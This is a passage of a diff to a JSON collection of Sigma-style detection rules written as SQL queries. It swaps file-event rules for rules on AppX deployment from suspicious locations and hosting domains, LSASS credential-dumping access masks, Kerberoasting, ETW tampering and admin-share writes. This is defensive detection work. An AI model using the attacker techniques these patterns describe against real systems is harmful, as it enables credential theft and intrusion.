"2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Suspicious AppX Package Locations", + "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" ], - "filename": "file_event_win_malware_pingback_backdoor.yml" + "filename": "win_appxdeployment_server_susp_package_locations.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - File", - "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard 
(Nextron Systems)", + "title": "Suspicious Remote AppX Package Locations", + "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_winsat.yml" + "filename": 
"win_appxdeployment_server_susp_domains.yml" }, { - "title": "Suspicious Word Cab File Write CVE-2021-40444", - "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", - "status": "experimental", - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", - "author": "Florian Roth (Nextron Systems), Sittikorn S", + "title": "HybridConnectionManager Service Running", + "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" ], - "filename": "file_event_win_winword_cve_2021_40444.yml" + "filename": "win_hybridconnectionmgr_svc_running.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", - "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", - "status": "test", - "description": 
"Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "title": "Loading Diagcab Package From Remote Path", + "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "status": "experimental", + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate package hosted on a known and authorized remote location" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_1675_printspooler.yml" + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" }, { - "title": "Windows Shell File Write to Suspicious Folder", - "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", - "status": "experimental", - "description": "Detects a Windows executable that writes files to suspicious folders", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Outbound Kerberos Connection - Security", + "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", + "tags": [ + "attack.lateral_movement", + "attack.t1558.003" + ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs%' ESCAPE '\\')) OR ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_shell_write_susp_directory.yml" + "filename": "win_security_susp_outbound_kerberos_connection.yml" }, { - "title": "Powerup Write Hijack DLL", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", - "status": "test", - "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it 
builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", - "author": "Subhash Popuri (@pbssubhash)", + "title": "Generic Password Dumper Activity on LSASS", + "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "status": "experimental", + "description": "Detects process handle on LSASS process with certain access mask", + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.001" + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" ], "falsepositives": [ - "Any powershell script that creates bat files" + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName 
LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE 
'%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_powerup_dllhijacking.yml" + "filename": "win_security_susp_lsass_dump_generic.yml" }, { - "title": "Created Files by Office Applications", - "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "status": "experimental", - "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "title": "Weak Encryption Enabled and Kerberoast", + "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", + "status": "test", + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "author": "@neu5ron", "tags": [ - "attack.t1204.002", - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) 
AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE 
'%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" ], - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" + "filename": "win_security_alert_enable_weak_encryption.yml" }, { - "title": "Suspicious File Creation In Uncommon AppData Folder", - "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "status": "experimental", - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). 
This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Enabled User Right in AD to Control User Objects", + "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "status": "test", + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" ], - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" + "filename": 
"win_security_alert_active_directory_user_control.yml" }, { - "title": "Potential Remote Credential Dumping Activity", - "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "status": "experimental", - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "author": "SecurityAura", + "title": "Password Dumper Activity on LSASS", + "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "status": "test", + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "author": "sigma", "tags": [ "attack.credential_access", - "attack.t1003" + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" ], - "filename": "file_event_win_remote_cred_dump.yml" + "filename": "win_security_susp_lsass_dump.yml" }, { - "title": "Suspicious DotNET CLR Usage Log Artifact", - "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", - "status": "experimental", - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). 
These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", - "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", + "title": "ETW Logging Disabled In .NET Processes - Registry", + "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' 
ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" ], - "filename": "file_event_win_net_cli_artefact.yml" + "filename": "win_security_dot_net_etw_tamper.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack", - "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "title": "SMB Create Remote File Admin Share", + "id": "b210394c-ba12-4f89-9117-44a2464b9511", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" + "filename": "win_security_smb_file_creation_admin_shares.yml" }, { - "title": "Suspicious Desktopimgdownldr Target File", - "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "title": "Active Directory User Backdoors", + "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", "status": "test", - "description": "Detects a 
